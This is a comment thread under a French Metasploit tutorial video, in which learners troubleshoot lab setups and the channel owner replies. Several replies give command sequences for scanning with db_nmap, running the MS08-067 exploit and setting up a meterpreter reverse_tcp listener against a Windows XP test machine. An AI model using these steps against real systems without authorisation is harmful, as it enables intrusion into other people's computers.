[2] Metasploit tutoriel FR : Les joies de l'exploitation

Поделиться
HTML-код
  • Опубликовано: 4 ноя 2024

Комментарии •

  • @gaelgirard8044
    @gaelgirard8044 8 лет назад +12

    Salut! Je suis clairement débutant dans la sécurité informatique, et j'avais du mal à m'y mettre tellement la vue des lignes de code me mettaient la nausée mais la... Wow, tu arrives à rendre ces lignes passionnantes! merci de faire partager ta passion, et comme beaucoup d''autres j'attends avec impatience la prochaine vidéo et le blog :D
    bonne continuation et bon courage!

    • @nasmRE
      @nasmRE 6 лет назад +2

      Mec si les lignes de codes te mettent la nausée t'es mal.
      Sinon Documentes toi, apprends un langage lis des livres entraines toi et le tour est joué.
      Aprés root-me,root-me,root-me...

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  6 лет назад +1

      Ah oui gael la programmation c'est OBLIGATOIRE dans ce domaine. C'est ce que j'incite a ce que tu fasse si tu comprend bien dans la 4eme vidéo. Metasploit est bien pour comprendre le fonctionnement d'une vulnérabilité facilement . Mais dans le fond il ne t'aidera pas.

    • @nasmRE
      @nasmRE 6 лет назад +1

      +Informatrix tu penses poster bientot ??

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  6 лет назад +1

      Bientôt oui mais dans combien de temps je ne pourrait pas te répondre. Car j'essaye d'innover et de développer un peu plus les tutos que je souhaite créer, car rester derrière un pc et un PowerPoint à la longue tout le monde le fait. Cela prend énormément de temps mais sa en vaudra la peine je pense. Si tu veut tu peut nous rejoindre sur discord on sera ravie de t'accueillir.

    • @nasmRE
      @nasmRE 6 лет назад +1

      Informatrix : sécurité informatique
      Merci de m'avoir répondu.
      C'est avec plaisir que je viendrais sur Discord mais ce qui mavais rebuté jusque là c'est que je peux pas être assez actif.
      Mais bon je verrai...
      Merci!!

  • @freddykrueger1907
    @freddykrueger1907 8 лет назад +3

    Superbe ! bien expliqué :) un grand merci pour ce partage de connaissance.

  • @freekiss007
    @freekiss007 8 лет назад

    enfin qqs un qui s'y connais et explique bien en son temps,
    je suis sous kali depuis qqs annnée mnt et je regrette d'avoir achetée la video msf sur alform.com car les tiens sont super,
    bonne continuation,
    ghostman.

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      bonjour ghostman .
      merci pour ton commentaire dont je répond 5 jours plus tard . je suis en congés donc j'en profite pour vous répondre et faire progresser la chaîne.
      pour alphorm je suis flatter de ta réponse. pourtant tu ne peut pas et moi-même me comparer à des professionnels qui ont passer des années à obtenir leurs diplômes ainsi que leur expérience dans le métier même si j'en ai aussi mais aucun diplôme) je pourrais pas le permettre de payer 2800€ ht pour passer la CEH ou 500€ pour avoir les certifications de l'offensive security.
      c'est pour sa je suis flatter mais je ne peut pas dire quoi que soit envers une boîte qui a des années la dedans et qui ont le monopole

    • @freekiss007
      @freekiss007 8 лет назад

      Je te comprends entièrement,et peux etre que l on sais deja vu chez mickey, :-). Si on gardais contact,ce serais pas mal,echange vidéo,etc. Bien a toi...

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      pas de soucis regarde dans la première vidéo dans les commentaires tu as mon email et mon skype

  • @jospindjokngoue6871
    @jospindjokngoue6871 6 месяцев назад +1

    Bonjour, lorsque je lance la session meterpreter je recois l'erreur "exploit completed but no session was created", j'ai exploré le journal de metasploit, rien de concret. Je ne sais pas si c'est ma version d'OS qui est patchée ou alors il s'agit d'un autre problème ( j'utilise la version 6 de msf et windows xp SP 3 32 bits)

  • @SoftwareofnetBlogspotdaho
    @SoftwareofnetBlogspotdaho 6 лет назад

    Vraiment votre video est très bien faite et bien expliquée

  • @wassimsaidi4026
    @wassimsaidi4026 Год назад

    Merci beaucoup fréro pour l'explication

  • @polulupo1
    @polulupo1 6 лет назад

    Merci encore pour ce tuto, il est très bien fait

  • @loantricaud5674
    @loantricaud5674 8 лет назад

    Super vidéo ! hâte de voir la prochaine vidéo ! 😉

  • @florian5804
    @florian5804 7 лет назад +1

    Très bonne vidéo je la conseille !! +1 pouce bleu

  • @loantricaud5674
    @loantricaud5674 8 лет назад +4

    cependant pour ta prochaine vidéo sur la création de payload tu pourra passer a la dernière version de kali ? Puisque msfpayload et msfencode ont été remplacer par msfvenom et la commande msfcli n'existe plus . Donc sa serais sympa de faire un tuto avec ces nouvelle ligne de commande

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +loan tricaud Oui sans probleme, j'y comptait justement car je sais que si je fait la derniere partie de ce tuto sur kali 1.0 sa va poser probleme a ceux qui sont sur la 2.0.
      Par contre msfvenom est présent sur la 1.0. et pour ce qui concerne msfcli sur la 2.0 tu as une methode plus simple qui est d'utiliser le module " exploit/multi/handler " suivit du set PAYLOAD " le nom de ton payload " suivit de tes autres parametres.
      par exemple:
      tu as générer un payload reverse_tcp pour ouvrir une session meterpreter pour windows sur une machine virtuel que tu a installer sur ton résau local .
      tu te rend dans la msfconsole :
      tu tape use exploit/multi/handler
      ensuite tu fait: set PAYLOAD windows/meterpreter/reverse_tcp
      après tu fait un set LHOST 192.168.1.1 ( ip locale en exemple bien sur sa changera chez toi suivant ton FAI )
      il te reste plus qu'a taper exploit et attendre que le payload soit demarrer sur ta machine virtuelle.
      As-tu a peut pres compris le principe du prochain tuto ?

    • @loantricaud5674
      @loantricaud5674 8 лет назад +1

      +Informatrix , création , solution informatique
      Oui je connait déjà mais je regarde t'es vidéo car je les trouve très explicatif et elle m'apporte quelque détaille que je ne connaissait pas 😉.
      Merci pour tes vidéo 😃

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +loan tricaud je serai sur skype ce soir si tu veu mp mon pseudo est Fre4ks_3xpl0it

    • @animalquivitparmisnous4565
      @animalquivitparmisnous4565 7 лет назад

      Informatrix : sécurité informatique salut g un probleme il me dit "exploit succefull but no session"

    • @nasmRE
      @nasmRE 6 лет назад

      +Veugeutaahh le Prince des séian c'est pas un problème c'est juste que tu n'a pas de session ouverte sur la machine distante.

  • @touremandjouh9911
    @touremandjouh9911 5 лет назад

    bonjour , super votre tuto. mais j'ai un souci au niveau de l’affichage des exploits.et en effet comme sur la video jai alloué les adresses RHOST et LHOST et lorsque je tape la commande exploit ca nouvre pas meterpreter.merci

  • @tatsugaya3548
    @tatsugaya3548 2 года назад +3

    J'ai adoré mec mais tu fais des très bonnes vidéos mais ça fait longtemps que je vois plus de nouveautés tu as arrêté ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  2 года назад +5

      Merci. Non je n'ai pas arrêter mais beaucoup pris sur le plan professionnel. J'ai un nouveau micro je vais relancer la machine.

    • @tatsugaya3548
      @tatsugaya3548 2 года назад +1

      Ah je vois. Courage

    • @thiernodiallo9309
      @thiernodiallo9309 2 года назад +1

      @@informatrixsecuriteinforma6057 enfin ça fait longtemps

  • @lerirealasauceivoirienne9814
    @lerirealasauceivoirienne9814 5 лет назад

    salut moi je suis au mali et ici il n'existe pas de structure de formation dans le domaine de la sécurité informatique.Franchement j'aimerais savoir s'il existe une possibilité à votre niveau de dispenser des cours en présentiel ,si oui qu'elles sont les modalités de payement.

  • @wilanne
    @wilanne 8 лет назад

    Bonjour à toi, premièrement très bon tuto !
    Deuxièmement lorsque tu tape la commande suivante; msf vulns, tu as une vulnerabilité appelée ns08-067. Lorsque je fais la même commane j'obtient Time: 2016-04-21 15:58:21 UTC Vuln: host=XXX.XXX.X.XX name=Generic Payload Handler refs= (Les X représentes l'IP, je la cache.) Et lorsque je tape; search Generic Payload Handler j'obtient une liste énorme de Payloads, Post ect. J'en ai repérer un qui correspond à sa qui ai écrit la commande vulns (Generic Payload Handler), donc voilà sa marche mais lorsque que je fais show options il se passe ça;
    Module options (exploit/multi/handler):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    Exploit target:
    Id Name
    -- ----
    0 Wildcard Target
    Dois-je utiliser un autre exploit, un payload ou encore autre chose ? (Je suis encore un débutant, je travail sur Kali-Linux 2)
    Merci d'avance
    Cordialement

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      salut Léo et merci à toi .
      attention ne pas confondre payload et exploit . un payload est un module de connexion direct ou inverser avec la machine cible. dans ce tuto il n'est question uniquement d'exploit . se sont des modules qui utilise une faille présente sur la machine suivant son port son services et sa version .
      le module exploit/multi/handler est un module decoute.
      par exemple dans le prochain tuto tu verras comment t'en servir grâce à la generation de payload via msfvenom .
      dans ce tuto ici on ne s'en sert uniquement pour implanter une persistance et comment avoir une écoute grace a lexploit/multi/handler.
      la commande vulns te sert à lister la liste des vulnérabilités présente sur la machine cible . ici tu a la faille ms08_067_netapi . donc un exploit disponible depuis metasploit .
      donc tu fait search ms08_067netapi
      -use "le path pour utiliser lexploit'
      - set Rhost " l'IP de la machine cible"
      - set target "l'id de la version de l'os" ( pas obligatoire )
      -exploit
      et la tu doit avoir compromis la machine.

    • @wilanne
      @wilanne 8 лет назад

      +Informatrix , création , solution informatique Merci beaucoup à toi mais si je tape la commande vulns et que je n'obtient pas ms08-67 je peut quand même l'utiliser ?
      En tout cas merci pour ta réponse rapide et précise.
      Cordialement

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +LÉO A regarde la version de windows xp que tu as et tape la commande show targets dans le module ms08 . ou alors tu peut toujours tenter ta chance car tu peut soit avoir des faux positif ou des faux négatif donc le seul moyen c'est de tenter ta chance

    • @wilanne
      @wilanne 8 лет назад

      +Informatrix , création , solution informatique Ok je vais essayer sa merci !
      L'ordinateur cible est sous Windows 7 et j'ai l'impression que je vais devoir approfondir tout sa !

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +LÉO A je te conseil de te trouver une ISO de windows XP et de suivre le tuto avec pour mener a bien le tuto

  • @flush7576
    @flush7576 8 лет назад

    salut et merci pour ton tuto très bon boulo gg continue

  • @VectirR6
    @VectirR6 7 лет назад

    yo je comprends pas comment tu peux trouver la vulnérabilitée Ms08067 sans la commande vulns

  • @learntocode5938
    @learntocode5938 8 лет назад +1

    j'ai télécharger une machine virtuel(vm) sur khali linux et j'aimerez que vous faîtes plus de vidéos sur ce os en sécuriter informatique

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад +1

      est ce que vous avez au moin prit le temps de voir déjà les vidéos disponible ainsi que la mise en pratique ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад +2

      et vous n'êtes pas seul à attendre des vidéos . malheureusement jai une vue privé et une vie professionnelle comme beaucoup d'abonné sur cette chaîne donc vous attendrez comme tout le monde . la prochaine vidéo est prévu pour la semaine prochaine . en attendant si vous voulez plus de renseignements, questions ou aide je vous invite à rejoindre la page facebook et le groupe skype prévu à cet effets

  • @durstigflooz3044
    @durstigflooz3044 8 лет назад

    bonjour. j'ai suivi avec bcp d'attention ton explication de Prof. c'est très cool!!! sauf quelques parties que j'ai pas compris à cause de mon niveau qui est très bas en informatique. je voudrais savoir ce qui se passe lorsque le systeme ne trouve pas la faille avec la commande "vulns"? et qu'en est -il d'un site( contrairement à une machine) en ce qui concerne la compromission?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      Durstig Flooz bonjour , si la commande vulns ne fonctionne pas cela voudra dire que vous devrez chercher vous même en utilisant par exemple des modules auxiliaires ou de scan.
      concernant les compromissions de sites web cela relate des vulnérabilitées Webapp, ces types de vulnérabilités sont complètement différentes des vulnérabilitées que vous pourrez trouvez sur des système d'exploitation.

  • @Éricndri12
    @Éricndri12 6 лет назад

    bonjour, merci pour tes tutos
    je voudrais savoir si cet exploit marche seulement si et seulement si vous etes sur le meme reseau local?
    dans le cas c'est une intruision à distance, faut il utliser "generate" et envoyer le payload à la machine victime?
    merci encore

    • @acefrz4602
      @acefrz4602 6 лет назад

      Mr Tsunami c'est exactement ce que je me suis dis en début de vidéo. Il prend l'adresse locale du pc Windows xp, mais si on veut s'orienter sur une machine externe à notre réseau, l'adresse locale de 1 elle sert à rien et de deux on ne l'a pas forcément, quel adresse doit on marquer ducoup ?

  • @exodoc6025
    @exodoc6025 7 лет назад

    Bonjour Informatrix, j'ai une petite question, sur l'ordi de ma femme j'ai détecté une prise de commande sur son ordi windob 7 avec hisjackthis je fixe tous s qu’il me dis mais je pense qu'il dois se servir de processus auriez vous une solution ? en tous cas grand merci car c'est très bien expliqué et sa fait plaisir d'avoir un tutos d'information sur kali et non pas un crack wifi ou on dois copier sans savoir se qu'on fait. Bonne continuation.

    • @clementcroise6515
      @clementcroise6515 6 лет назад

      bjr tu vas dans le moniteur de ressource windows puis dans Réseau ; memoire ; processeur ect... regarde si il n'y a pas un service qui prend bcp de ressource

  • @GouGoune96
    @GouGoune96 8 лет назад

    Tout d'abord superbe vidéo ! Ensuite j'ai un problème pour le scan nmap de ma machine virtuelle windows xp, à chaque fois que je tente de faire un scan, il retourne comme infos que l'OS est VirtualBox et non windows xp... Alors forcément les étapes suivantes ne marchent pas. Si toi ou quelqu'un d'autres aurait une solution à me proposer cela serait vraiment sympa ! :D En tout cas continue comme ça tu fait vraiment un bon boulot. ( J'ai beau essayé différent type de connexions ça ne marche pas... Je tiens à préciser que j'ai dl W xp en SP3 )

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      Alessandro Pozzi tes deux machine sont en NAT ?

    • @GouGoune96
      @GouGoune96 8 лет назад

      Non seulement sur Kali car sur xp dés que je veux le mettre en nat j’obtiens une adresse ip non locale dans le style 10.0.2.30. qui bien évidement me renvoie une erreur sous l'utilitaire nmap. Donc pour réussir à faire un scan sur xp je suis obliger de sélecter la méthode par pont qui me renvoie une adresse ip cohérente mais qui malheureusement ne marche pas non plus sous nmap vu qu'il détecte virtualbox comme os et non Windows xp... Merci de ta réponse plus que rapide ! :D

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      tente de passer sous vmware , sa te facilitera la tache ;) si tu as besoin rejoint le groupe pour une aide personalisé ;)

    • @GouGoune96
      @GouGoune96 8 лет назад

      Ok merci de ta réponse, je testerai cela au soir ! :D Et de quel groupe parles-tu ? Tu fais allusion à la section communauté du site rootme ou alors à un autre groupe ?

  • @matthieumick3335
    @matthieumick3335 7 лет назад

    Au tout début de la vidéo tu tapes une adresse ip local, mais est ce qu'on est obliger d'être dans le même réseau que la machine ou alors on peut être à distance et cela fonctionne tout de même ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      Matthieu Mick tu n'est pas forcément obliger d'être sur le même réseau de la machine cible. seulement tu n'auras sûrement pas le même résultat lors du scanner si un pare feu bloque le trafic entrant et sortant

  • @theocollinet6256
    @theocollinet6256 Год назад

    Merci pour ce tuto ! j'ai un probleme lorsque je tape hosts pour voir si le scan a bien été enregistrer dans ma base de donnée on m'afffiche " Database not connected"

    • @wassimsaidi4026
      @wassimsaidi4026 Год назад

      tu dois démarrer d'abord le service et lier metasploit à cette base de donnée

  • @abderrahmenlahmedi8886
    @abderrahmenlahmedi8886 7 лет назад

    salut,pouvez vous me recommander un bon livre pour apprendre le pen-test sur les app web en français ? et merci d'avance

  •  7 лет назад

    Très bon tuto mais j'suis bloqué dès le debut, quand tu tape :
    db_nmap -v -sS -A (ip.locale)
    j'ai ce message qui s'affiche
    [*] Nmap: 'You requested a scan type which requires root privileges.'
    [*] Nmap: 'QUITTING!'
    c'est due a quoi?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      Carotte Rapée es tu sur une session user ou root ?

    •  7 лет назад

      Informatrix : sécurité informatique une session Root, je me suis abonné et j'ai regardé toutes tes vidéos. Ils sont très bien expliqué. Et tu sais de quoi tu parles. Ca fait plaisir de tombé sur une personne passionné !

  • @lehubinternetservices3033
    @lehubinternetservices3033 7 лет назад

    Bonsoir et merci pour tout ce que tu fais Informatix.
    j'aimerai savoir comment faire si la machine cible n'a pas de vulnérabilité ?? parce que j'ai fait le scan et les ports 135, 445,139 sont ouverts mais la commande "vulns" ne me montre pas de vulnérabilité. Comment faire donc

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +hub le tente alors un scanner de vulnérabilité comme nessus ou openvas .Il y a forcément une vulnérabilités sur un XP sp1/2/3

    • @lehubinternetservices3033
      @lehubinternetservices3033 7 лет назад

      la commande s'il te plait pour les deux scanner parce que j'ai lancé le scanner syn, ssh, ftp_version et rien donc la commande de nessus et openvas

    • @lehubinternetservices3033
      @lehubinternetservices3033 7 лет назад

      alors que la machine cible fonctionne sur OS XP SP2

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +hub le la commande vulns ne marche pas à tout les coup . Cela dépendra de l'os et de sa version et aussi du scanner nse de nmap qui lui utilise certains scripts de vulnérabilités.

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +hub le c'est normal que tu ne trouve pas nessus et openvas si tu ne les a pas installer . Ce sont des scanner de vulnérabilité à part de metasploit

  • @jerem77y
    @jerem77y 8 лет назад +2

    Salut, merci pour la vidéo c'est super bien expliqué, mais je pense avoir un ptit soucis.
    Quand j'envois la commande "vulns", celle ci ne me renvois rien. Sais tu pourquoi ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      salut merci encore . as-tu essayer db_vulns ?

    • @jerem77y
      @jerem77y 8 лет назад

      +Informatrix : sécurité informatique oui j'ai essayé ça aussi, j'ai fais vulns apres avoir fais un scan d'un ordinateur sur mon reseau, sachant que j'ai kali linux qui tourne sous machine virtuelle

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      peut tu me donner la liste des commandes que tu as rentrée précédemment ?

    • @jerem77y
      @jerem77y 8 лет назад

      +Informatrix : sécurité informatique les commandes que j'ai tapé etaient les meme que tu montre dans la video, c'est a dire : db_nmap -v -sS -A 192.168.0.30 /* qui est un ordinateur sur mon reseau local */
      hosts
      vurnls
      Voila les commandes que j'ai effectué.
      Eh au fait j'en profite pour poser ma question, sur quoi est ce que la commande vurnls se base pour dire quelle machine scannée possede ou non des vulnerabilité ?
      Merci pour prendre le temps de repondre en tout cas

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      si tu as plusieurs machines scanner il se basera sur plusieurs Vecteurs comme l'OS ou les services ainsi que leur version . après cela ne veut pas dire que la commande vulns fonctionnera à tout les coups, sa serai trop simple sinon cela nous enlèverai le privilège de rechercher nous même les vulnérabilitées ;)

  • @pathinferno
    @pathinferno 7 лет назад

    salut, me revoilà pour une nouvel question !! ^^ j'ai le même problème que Jey Husson la commande "vulns" ne m'affiche rien.....comme tu lui a conseiller, j'ai tester " db_vulns " le retour est que la commande est obsolète, j'ai donc fait un " help " pour voir les commande au cas ou....est la commande " vulns " existe bien, je suis donc censer avoir un retour quand je fait la commande mes la rien .... Aurais tu une idée ? a s'avoir que j'ai fait les même commande que toi ( bien sur avec mon IP cible) ... ma cible est Windows XP familiale Version 2002 sp2 qui tourne comme kali sous VMware et les 2 en connexion Briged.
    Est super vidéo , j'ai adoré l'exercice sur root_me
    Cordialement

    • @pathinferno
      @pathinferno 7 лет назад

      Je vient aussi de me rendre compte quand tapant la commande " hosts " dans os_name ses windows 2000 qui apparais !!!! .....j'ai 2 iso windows XP et les deux sont identique en résulta......pourtant panneau de configuration / performance maintenance / System ses bien windows xp ........
      Cordialement

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      pathinferno salut . alors non la commande vulns est facultative. tu pourras l'utiliser sur une VM sous Metasploitable 2 tu aura un résultat . mais sous une machine sous XP elle ne fonctionnera pas à tout les coup . elle aurait très bien put ne pas fonctionner chez moi. dans ce cas rien ne vaut un bon scanner de vulnérabilité comme nessus , openvas etc..... concernant la commande hosts et le windows 2000 tu n'est pas non plus le seul dans ce cas. mais ce n'est pas méchant étant donner que cette vulnérabilitées est présente aussi sur cette version de système.

    • @pathinferno
      @pathinferno 7 лет назад

      ok merci bien pour t'on aide, je comprend mieux, oui j'ai sauter l’étape vulns vue que dans t'a vidéo tu explique que l'exploit ms08_067 est un exploit pour Windows xp je les tester direct !!! est sa passe :-p par contre je me poser la question : est ce que chaque Windows on des exploit comme celui la ? je suppose que non sinon trop simple......je reste impressionné par tout ce qui est possible de faire sans que la cible ne sens rende compte.......j'ai peur de mon pc maintenant !!!!!! merci et continue t'est vidéo elle sont super bien expliquer +1

  • @VectirR6
    @VectirR6 7 лет назад

    Yo quand j'entre la commande "vulns" rien ne s'effectue.. de l'aide ? =) j'ai fais plein de scan sur différentes ip (avec db_nmap bien sur) mais a chaque fois vulns ne fais rien.

    • @VectirR6
      @VectirR6 7 лет назад

      Après quelques redémarrage ça a finit par marcher ?wtf

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +daniel ou victor la commande vulns ne fonctionne pas à tout les coups. Elle a fonctionné lors de ce tutoriel mais elle aurait très bien pu ne pas fonctionner aussi. Dans tout les cas il vaut mieux toujours passer par un scanner de vulnérabilité qui te donnera plus de résultats

    • @VectirR6
      @VectirR6 7 лет назад

      ok maintenant la commande marche sans problème je ne sais pas pourquoi. Mais es-ce qu'il un moyen de trouver l'exploit (ici MS08-067) autre que "vulns" ? On dirait que pour toi cette commande est optionnelle alors que pour moi c'est le seul moyen de trouver l'exploit.

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      daniel ou victor comme je t'avais dit précédemment . tu peux sois passer par un scanner de vulnérabilités ou effectuer tes propres recherches via une base d'exploit publique afin de savoir si une vulnérabilités est disponible,de comprendre son fonctionnement et à partir de quel langage a t-elle été ( voir 4eme vidéo ). cest comme cela que tu pourras te passer de la commande vulns qui est très "capricieuse".

    • @VectirR6
      @VectirR6 7 лет назад +1

      Ok merci pour le "support" même 1 an après =)

  • @gerardtroipardieu7185
    @gerardtroipardieu7185 8 лет назад

    faudrait faire une video metasploit a travers internet ^^ merci encore pour tes video

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      c'est inclus dans le tutoriel ne t'en fait pas . déjà root-me.org c'est bien pour ceux qui veulent prendre la main. pour ce qui est des payloads à travers le net on y viendra aussi ce n'est pas compliqué du tout. merci

  • @vincentjacquet7919
    @vincentjacquet7919 7 лет назад

    Salut je suis débutant mais j'ai remarqué un problème quand je fais des scans, le truc c'est que les scan ne s'enregistre pas quand je vais voir dans Hosts. Je voulais savoir comment résoudre ça. Merci de ta réponse

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад +1

      vince68 [FR] quand vous êtes dans Metasploit, vous taper bien la commande db_nmap pour exécuter vos scan ?

    • @vincentjacquet7919
      @vincentjacquet7919 7 лет назад

      Oui je tapé bien les commandes de scan mais je crois que c'etait a cause des scans et des ip que j'utilisé

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +vince68 [FR] les IP était sur la même plage d'adresse ?

  • @blaisekouassi5748
    @blaisekouassi5748 4 года назад

    Coool!

  • @ngion5013
    @ngion5013 7 лет назад

    Bonjour, mais comment on peut connaître l'ip local de la victime? Faut-Il sont adresse ip pour retrouver son ip local?😐

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +iDreaZyy Road to 0.1k non l'IP locale à distance vous ne laurez pas comme sa . Dans le cas d'un scanner à distance il vous faut l'adresse IP Public.

    • @ngion5013
      @ngion5013 7 лет назад

      Informatrix : sécurité informatique D'accord, merciii beaucoup!😊

  • @accrocraft
    @accrocraft 8 лет назад

    l'exemple montrer sur la vidéo est en local , mais cela marche t-il de meme pour une machine non connu ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +ultime accrocraft tu veut dire depuis une machine depuis le net ?

    • @accrocraft
      @accrocraft 8 лет назад

      +Informatrix , création , solution informat
      par exemple un pc de une personne distante, un ami a moi souhaiterait tester son ordinateur aux failles et il voudrait donc que je fasse un test d'intrusion, pour cela je dois seulement lui demander son adresse ip ? ou autre chose ?

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад +1

      +ultime accrocraft tout depend de ce que tu veut faire , si tu veut que ton pentest soit baser sur du whitebox du blackbox ou greybox,.
      -Si tu veut que ton pentest soit baser que sur du BlackBox donc a l'aveugle , tu devras te debrouiller tout seul du debut a la fin , c'est a dire lors de ta phase de collecte d'informations active et passive , pendant la recherche de faille et sur l'exploitation de la machine distante pour ensuite etablir des solutions afin de renforcer la securite
      -Si tu veut que ton pentest sois baser sur du WhiteBox , ton amis te donnera la totalitee des informations que tu auras besoin pour proceder a l'exploitation pour ensuite etablir des solutions afin de renforcer la securite
      -Et enfin le GreyBox je ne te fait pas de dessin , voir la premiere et la deuxieme solution , ton amis te donnera des informations limitee; et tu devras te debrouiller pour la suite pour finir par etablir des solutions afin de renforcer la securite
      Si tu n'as pas regarder la premiere partie de ce chapitre concernant les bases et la recherches de vulnerabilitees je te conseil d'aller la voir avant de passer a la suite.
      Ps : N'oublie pas d'avoir l'accord écrit et signer de la personnes chez qui tu vas etablir le pentest

    • @accrocraft
      @accrocraft 8 лет назад

      +Informatrix , création , solution informatique
      tout d'abord merci de m'avoir bien expliquer :) et répondu a ma question
      je tiens compte de tous cela, et je comprend que il faut une preuve écrite en cas de problème ensuite.
      Même si mon ami peut me donner toutes les infos nécessaire je préfère essayer de moi même et voir si je peux y arriver ( a fin de tester mes capacité et m'améliorer) cependant si je n'y arrive pas je lui demander de mes donnée toutes les infos :)
      J'ai une dernière question :
      pour réaliser un pentest de une machine , avec seulement l'adresse ip de celle-ci est t'il possible de le réaliser ? peut-on lancé un scan (nmap ect...) avec l'adresse ip de la victime ?
      ps: désolée de toutes ces questions :)

    • @accrocraft
      @accrocraft 8 лет назад

      +Informatrix , création , solution informatique
      ? :)

  • @atomiikneo2005
    @atomiikneo2005 8 лет назад

    Bonjour, je voudrais savoir si tu as fais des études dans l'informatique ( sécurité ) si oui lequel, ou si tu as appris tout seul

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      bonjour. je n'ai fait aucune étude dans l'informatique. j'ai tout appris de moi même en prenant le temps de faire des recherches sur le net .lire des livres et de la documentations. pourquoi ? tu recherches à faire des études dans la sécurité ?

    • @atomiikneo2005
      @atomiikneo2005 8 лет назад +1

      Oui, en effet je suis en seconde et la sécurité informatique, m’intéresse malgré cela je ne suis pas très fort en math, donc je me suis réoriente vers un bac ES je sais que ce n'est pas le meilleur bac mais je sais que en S je ne pourrais pas suivre. Donc c'est pour ça que je voulais vous demander quel étude vous avez fais (mais si vous avez des information à se sujet je suis preneur)

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  8 лет назад

      +AToMiiK Neo honnêtement je n'ai pas envie de te raconter de conneries mais est ce que tu a essayer de te renseigner à l'epitech ?

    • @atomiikneo2005
      @atomiikneo2005 8 лет назад

      Si c'est comme l'Onisep oui, je me suis déjà renseigné la seul chose que je n'arrive pas à trouvé c'est si il est possible d'aller dans une école de sécurité informatique avec un bac ES, d'où ma demande

    • @atomiikneo2005
      @atomiikneo2005 8 лет назад

      Je voudrais te demander une dernière chose, as-tu des livres ou de la documentation à me conseiller qui sont intéressent sur metasloit, test d’intrusion ou autre chose que l'on peut trouver dans le commerce

  • @charlesmcj
    @charlesmcj 4 года назад

    Salut! j'aimerais utiliser Metasploit pour exploit un pc windows 10... ca ne marche pas... comment je peux faire ca ... merci InfoMatrix

    • @SuperLampadaire
      @SuperLampadaire 2 года назад

      Deja, il y a un premier probleme, le pare feu est sans doute activer, mais surtout, les antis virus + mises a jours auto rendent ce genre d'attaques plus compliqués. Essaye deja de desactiver le pare feu, et vois si tu peux avancer. Sinon, installes une machine virtuelle windows XP et utilise un reseau NAT

  • @RedBoxing
    @RedBoxing 7 лет назад

    marche pas le db_nmap sous kali linux 2.0
    sa me marque
    [-] Database not connected

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад +1

      TheBOOMGAMEUR service postgresql start et clique sur l'icône Metasploit lors de la première utilisation pour créer les dB

    • @RedBoxing
      @RedBoxing 7 лет назад

      Informatrix : sécurité informatique ok merci

  • @badabicephas5282
    @badabicephas5282 4 года назад

    bonjour peut on trouver votre cour en pdf

  • @baptistepignier5390
    @baptistepignier5390 6 лет назад

    Déjà merci pour tes vidéos super intéressantes
    Et j'ai un petit problème super important
    J'ai cherché partout la solution en vain
    En téléchargeant win Xp sous vmware , Il m'affiche au moment du chargement
    "OPERATING SYSTEM NOT FOUND"
    J'ai essayé plusieurs ISO mais rien ne marche.
    Et oui j'ai bien coché la case " USE ISO IMAGE FILES" dans les settings
    Et sur internet il propose d'installer des logiciel chelou qui soit disant "résolve" le problème
    Aide moi s'il te plait car sans la machine XP je ne peux pas commencer ce tuto
    bye

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  6 лет назад

      Miradox Gaming bonjour . Essaye avec cette ISO mega.nz/#!TM1giDRK!iIHrZrV7Y5cdpIlVx1I-fN9XEaC-rKEF-bunHF3O1Xs

    • @baptistepignier5390
      @baptistepignier5390 6 лет назад

      Merci pour ta réponse mais toujours la même erreur
      Ça me met aussi "No boot file name received"

  • @jhhgghhggg9950
    @jhhgghhggg9950 5 лет назад

    ca marque no session created

  • @ikkeeeurss3309
    @ikkeeeurss3309 7 лет назад

    Moi cela ne marche pas quand je met vulns pour les vulnerabilitées cela ne marche pas ca me remet "msf" mais rien du tout d autre :'(

    • @ikkeeeurss3309
      @ikkeeeurss3309 7 лет назад

